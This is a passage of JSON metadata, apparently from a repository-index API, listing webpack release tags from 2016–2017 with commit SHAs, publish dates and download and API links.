fests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058